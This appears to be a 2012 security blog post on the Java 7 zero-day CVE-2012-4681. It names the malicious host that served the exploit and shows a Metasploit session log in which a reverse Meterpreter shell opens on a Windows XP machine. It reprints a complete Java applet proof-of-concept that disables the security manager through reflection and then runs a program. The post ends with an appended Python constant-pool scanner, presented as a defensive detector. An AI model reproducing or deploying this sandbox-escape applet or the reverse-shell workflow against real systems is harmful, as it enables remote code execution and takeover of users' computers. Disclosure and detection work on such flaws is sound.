Category: Network and Security

2012-09-01 02:48:09

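The most formidable thing about CVE-2012-4681 is that it is cross-platform (isn't that exactly Java's selling point?): no matter which platform or which browser, all are affected.

This time Oracle finally made an exception and released an update ahead of its regular quarterly schedule, fixing CVE-2012-4681, CVE-2012-1682, CVE-2012-3136 and CVE-2012-0547.

The host that 4681 made notorious this time is ok.aa24.net, and ok.aa24.net has long been on the dangerous-site lists.

If you ignore the warning and insist on viewing it, it looks like this:


Next, run a tracert and you will find that the IP actually belongs to Chunghwa Telecom. Does that count as the pride of Taiwan? XDD


By the way, meterpreter already has an attack package for it. XDD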


```
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 996 exploits - 484 auxiliary - 148 post
+ -- --=[ 251 payloads - 27 encoders - 8 nops
=[ svn r15451 updated 77 days ago (2012.06.11)
Warning: This copy of the Metasploit Framework was last updated 77 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
msf > use exploit/multi/browser/java_jre17_exec
msf exploit(java_jre17_exec) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.131:4444
[*] Using URL:
[*] Local IP:
[*] Server started.
msf exploit(java_jre17_exec) > [*] 192.168.1.132 java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] 192.168.1.132 java_jre17_exec - Sending Applet.jar
[*] 192.168.1.132 java_jre17_exec - Sending Applet.jar
[*] Sending stage (30216 bytes) to 192.168.1.132
[*] Meterpreter session 1 opened (192.168.1.131:4444 -> 192.168.1.132:1373) at Mon Aug 27 11:32:26 +0200 2012
msf exploit(java_jre17_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
OS : Windows XP 5.1 (x86)
Computer : home-7f7a6a7e2e
Meterpreter : java/java
meterpreter >
```



```java
//
// CVE-2012-XXXX Java 0day
//
// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
//
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon...
//
package cve2012xxxx;

import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Gondvv extends Applet
{
    public Gondvv()
    {
    }

    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    public void init()
    {
        try
        {
            disableSecurity();
            Process localProcess = null;
            localProcess = Runtime.getRuntime().exec("calc.exe");
            if (localProcess != null)
            {
                localProcess.waitFor();
            }
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}
```
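A defender-side check built from the listing above, as an added example that is not part of the original post: it parses a `.class` file's constant pool and flags files that contain the three strings this PoC hands to `Statement`/`Expression`. The function names and the sample builder are assumptions of this example, and the match is a heuristic for unobfuscated copies only.

```python
import struct

# Strings the PoC passes to java.beans.Statement / Expression. Assumption:
# an unobfuscated build keeps them as plain CONSTANT_Utf8 entries.
INDICATORS = {"sun.awt.SunToolkit", "getField", "setSecurityManager"}

# Bytes following the tag byte for each fixed-size constant-pool entry type.
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
         12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def utf8_constants(data):
    """Return the set of CONSTANT_Utf8 strings in a .class constant pool."""
    if len(data) < 10 or data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    count = struct.unpack(">H", data[8:10])[0]
    pos, index, found = 10, 1, set()
    while index < count:
        if pos + 3 > len(data):  # every entry is at least 3 bytes long
            raise ValueError("truncated constant pool")
        tag = data[pos]
        if tag == 1:  # CONSTANT_Utf8: u2 length, then that many bytes
            length = struct.unpack(">H", data[pos + 1:pos + 3])[0]
            found.add(data[pos + 3:pos + 3 + length].decode("utf-8", "replace"))
            pos += 3 + length
        elif tag in FIXED:
            pos += 1 + FIXED[tag]
        else:
            raise ValueError("unknown constant-pool tag %d" % tag)
        index += 2 if tag in (5, 6) else 1  # long/double occupy two slots
    return found


def looks_like_cve_2012_4681(data):
    """True when every indicator string is present in the constant pool."""
    return INDICATORS <= utf8_constants(data)


def build_sample(strings):
    """Constructed test input: header, one Long constant, then Utf8 entries."""
    pool = b"\x05" + struct.pack(">q", 0)
    for s in strings:
        pool += b"\x01" + struct.pack(">H", len(s)) + s.encode("ascii")
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 51, len(strings) + 3) + pool


if __name__ == "__main__":
    poc = build_sample(sorted(INDICATORS) + ["java/beans/Statement"])
    print(looks_like_cve_2012_4681(poc))
```

Classes delivered inside a JAR have to be extracted (for example with Python's `zipfile`) before being passed to `looks_like_cve_2012_4681`.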
